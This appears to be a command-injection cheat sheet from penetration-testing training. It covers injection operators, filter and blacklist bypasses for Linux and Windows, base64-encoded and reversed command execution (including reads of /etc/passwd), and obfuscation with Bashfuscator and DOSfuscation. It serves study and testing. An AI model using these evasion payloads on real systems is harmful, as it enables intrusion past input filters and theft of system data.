# Injection Operators
| **Injection Operator** | **Injection Character** | **URL-Encoded Character** | **Executed Command** |
| ---------------------- | ----------------------- | ------------------------- | ------------------------------------------ |
| Semicolon | `;` | `%3b` | Both |
| New Line | `\n` | `%0a` | Both |
| Background | `&` | `%26` | Both (second output generally shown first) |
| Pipe | `\|` | `%7c` | Both (only second output is shown) |
| AND | `&&` | `%26%26` | Both (only if first succeeds) |
| OR | `\|\|` | `%7c%7c` | Second (only if first fails) |
| Sub-Shell | ``` `` ``` | `%60%60` | Both (Linux-only) |
| Sub-Shell | `$()` | `%24%28%29` | Both (Linux-only) |
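The table summarises which of the two commands run for each operator, but the behaviour is easiest to trust once seen. The script below is an added example, not part of the original page: it plays the role of a web handler that URL-decodes an `ip` parameter and splices it unquoted into `ping -c 1 <ip>`, then sends each URL-encoded operator through it. The real `ping` is replaced by a stub that only "reaches" `127.0.0.1` (an assumption made so the demo runs offline and deterministically), and the injected command is `echo INJECTED`.

```shell
#!/bin/sh
# Added example, not from the original page. A stand-in for a web handler that
# URL-decodes a query parameter and splices it unquoted into a shell command
# line; each operator from the table above is then sent through it to show
# which of the two commands actually run. Real pings are replaced by a stub
# "ping" that only "reaches" 127.0.0.1, an assumption made so the demo runs
# offline and deterministically.

# url_decode STR -> STR with %XX escapes and '+' decoded, POSIX sh only.
url_decode() {
    rest=$1 out=''
    while [ -n "$rest" ]; do
        case $rest in
            %[0-9A-Fa-f][0-9A-Fa-f]*)
                hex=${rest#%}; hex=${hex%"${hex#??}"}
                # hex -> octal escape -> byte; the trailing x survives command
                # substitution so a decoded newline (%0a) is not stripped
                c=$(printf "\\$(printf '%03o' "0x$hex")x"); c=${c%x}
                out=$out$c; rest=${rest#???} ;;
            +*) out="$out "; rest=${rest#+} ;;
            *)  out=$out${rest%"${rest#?}"}; rest=${rest#?} ;;
        esac
    done
    printf '%s' "$out"
}

# Stub ping (constructed for this example): exit 0 only for 127.0.0.1, and
# mention PING on both paths so the output shows whether the first command ran.
STUB_DIR=$(mktemp -d)
trap 'rm -rf "$STUB_DIR"' EXIT
cat > "$STUB_DIR/ping" <<'EOF'
#!/bin/sh
# called as: ping -c 1 <host>
if [ "$3" = 127.0.0.1 ]; then
    echo "PING $3: 1 packet received"
else
    echo "PING $3: unknown host" >&2
    exit 2
fi
EOF
chmod +x "$STUB_DIR/ping"

# vulnerable_handler PARAM -> what the web app would return for ?ip=PARAM.
# The bug is the unquoted, unvalidated concatenation into the command string.
vulnerable_handler() {
    ip=$(url_decode "$1")
    PATH="$STUB_DIR:$PATH" bash -c "ping -c 1 $ip" 2>&1 || true
}

# contains HAYSTACK NEEDLE -> 0 if NEEDLE occurs in HAYSTACK.
contains() { case $1 in *"$2"*) return 0 ;; esac; return 1; }

# ran PARAM -> both | first | second | neither: which command(s) produced output.
ran() {
    out=$(vulnerable_handler "$1")
    if contains "$out" PING && contains "$out" INJECTED; then echo both
    elif contains "$out" PING; then echo first
    elif contains "$out" INJECTED; then echo second
    else echo neither
    fi
}

# Payloads exactly as they would travel in the request: the injected command is
# "echo INJECTED"; 10.0.0.99 makes the first command fail, 127.0.0.1 succeed.
for p in \
    '127.0.0.1%3becho%20INJECTED' \
    '127.0.0.1%0aecho%20INJECTED' \
    '127.0.0.1%26echo%20INJECTED' \
    '127.0.0.1%7cecho%20INJECTED' \
    '127.0.0.1%26%26echo%20INJECTED' \
    '10.0.0.99%26%26echo%20INJECTED' \
    '127.0.0.1%7c%7cecho%20INJECTED' \
    '10.0.0.99%7c%7cecho%20INJECTED'
do
    printf '%-32s -> %s\n' "$p" "$(ran "$p")"
done
```

Running it prints `both` for `;`, `%0a`, `&` and a successful `&&`, `second` for `|` (the first command's output is swallowed by the pipe), `first` for a failed `&&` and a successful `||`, and `both` for a failed `||`, which is exactly the last column of the table. Note that with `&` the `INJECTED` line usually arrives before the ping line, as the table says.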
# Most Common Operators used for Injections
| **Injection Type** | **Operators** |
| --------------------------------------- | ------------------------------------------------- |
| SQL Injection | `'` `,` `;` `--` `/* */` |
| Command Injection | `;` `&&` |
| LDAP Injection | `*` `(` `)` `&` `\|` |
| XPath Injection | `'` `or` `and` `not` `substring` `concat` `count` |
| OS Command Injection | `;` `&` `\|` |
| Code Injection | `'` `;` `--` `/* */` `$()` `${}` `#{}` `%{}` `^` |
| Directory Traversal/File Path Traversal | `../` `..\\` `%00` |
| Object Injection | `;` `&` `\|` |
| XQuery Injection | `'` `;` `--` `/* */` |
| Shellcode Injection | `\x` `\u` `%u` `%n` |
| Header Injection | `\n` `\r\n` `\t` `%0d` `%0a` `%09` |
# Filtered Character Bypass - Linux
| **Code** | **Description** |
| ----------------------- | ---------------------------------------------------------------------------------- |
| `printenv` | Lists every environment variable, so you can find one whose value contains the character you need |
| Spaces | |
| `%09` | A URL-encoded tab instead of a space; the shell treats it as whitespace |
| `${IFS}` | Expands to the default internal field separator characters (space, tab, newline), so the shell splits words there; only works unquoted |
| `{ls,-la}` | Brace expansion turns the comma-separated list into separate words, so this runs `ls -la` with no literal space |
| Other Characters | |
| `${PATH:0:1}` | Substring expansion; `PATH` almost always starts with `/`, so this yields `/` |
| `${LS_COLORS:10:1}` | Yields `;` when `LS_COLORS` starts with the common `rs=0:di=01;34` prefix; check the value with `printenv` first |
| `$(tr '!-}' '"-~'<<<[)` | Shifts every character one code point up (`!`..`}` maps onto `"`..`~`), so `[` becomes `\` |
# Blacklisted Command Bypass - Linux
| Code | Description |
| ------------------------------------------------------------ | ----------------------------------- |
| Character Insertion | |
| `'` or `"` | Total must be even |
| `$@` or `\` | Linux only |
| Case Manipulation | |
| `$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")` | Execute command regardless of cases |
| `$(a="WhOaMi";printf %s "${a,,}")` | Another variation of the technique |
| Reversed Commands | |
| `echo 'whoami' \| rev` | Reverse a string |
| `$(rev<<<'imaohw')` | Execute reversed command |
| Encoded Commands | |
| `echo -n 'cat /etc/passwd \| grep 33' \| base64` | Encode a string with base64 |
| `bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)` | Execute b64 encoded string |
---
# Filtered Character Bypass - Windows
| Code | Description |
| ----------------------- | ------------------------------------------------------------ |
| `Get-ChildItem Env:` | Lists every environment variable, so you can find one whose value contains the character you need - (PowerShell) |
| Spaces | |
| `%09` | A URL-encoded tab instead of a space |
| `%PROGRAMFILES:~10,-5%` | Substring of `C:\Program Files` from offset 10 up to 5 characters before the end, i.e. the space - (CMD) |
| `$env:PROGRAMFILES[10]` | Character at index 10 of `C:\Program Files`, the space - (PowerShell) |
| Other Characters | |
| `%HOMEPATH:~0,-17%` | Drops the last 17 characters of `HOMEPATH`, which leaves only the leading `\` when the path is 18 characters long (e.g. `\Users\htb-student`); adjust the offset to the target user's name - (CMD) |
| `$env:HOMEPATH[0]` | First character of `HOMEPATH`, which is always `\` - (PowerShell) |
# Blacklisted Command Bypass - Windows
| Code | Description |
| ------------------------------------- | ---------------------------------------- |
| **Character Insertion** | |
| `'` or `"` | Total must be even |
| `^` | Windows only (CMD) |
| **Case Manipulation** | |
| `WhoAmi` | Simply send the character with odd cases |
| **Reversed Commands** | |
| `"whoami"[-1..-20] -join ''` | Reverse a string |
| `iex "$('imaohw'[-1..-20] -join '')"` | Execute reversed command |
**Encoded Commands**
```powershell
# Encode a string with base64
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
# Execute b64 encoded string
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
```
# Env variables
CMD
```batch
:: View all current environment variables
set
:: Check a specific environment variable (set PATH lists every variable whose name starts with PATH)
echo %PATH%
set PATH
:: Set an environment variable (current session only)
set MYVAR=hello
:: Set an environment variable permanently (written to the registry, visible in new sessions)
setx MYVAR hello
```
PowerShell
```powershell
# View all current environment variables
Get-ChildItem env:    # or: gci env:
# Check a specific environment variable
$env:PATH
# Set an environment variable (current session only)
$env:MYVAR = "hello"
# Set an environment variable permanently (written to the registry, visible in new sessions)
setx MYVAR "hello"
```
# Character shifting
```bash
echo $(tr '!-}' '"-~' <<<[)
```
- Input: `[`
- Processing: ASCII code 91 -> +1 -> 92 (`\`)
- Output: `\`

In other words, `tr` maps the range `!`..`}` (ASCII 33..125) onto `"`..`~` (ASCII 34..126), shifting each character one position to the right by ASCII value. Any printable character except `~` can therefore be produced from the character just before it, which is useful when the character you need is filtered but its predecessor is not.
# Evasion Tools
`Bashfuscator` - Linux
```bash
# Install Bashfuscator
git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user
cd ./bashfuscator/bin/
# print help
./bashfuscator -h
# randomly pick an obfuscation technique
./bashfuscator -c 'cat /etc/passwd'
[+] Mutators used: Token/ForCode -> Command/Reverse
[+] Payload:
${*/+27\[X\(} ...SNIP... ${*~}
[+] Payload size: 1664 characters
# produce a shorter and simpler obfuscated command
./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
[+] Mutators used: Token/ForCode
[+] Payload:
eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"
[+] Payload size: 104 characters
# run the obfuscated command through bash -c to confirm it still works
bash -c 'eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'
```
`DOSfuscation` - Windows
```powershell
# Install DOSfuscation in PowerShell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
Invoke-DOSfuscation> help
# Using the tool
Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1
...SNIP...
Result:
typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt
# try running the obfuscated command on CMD as well
C:\htb> typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt
test_flag
```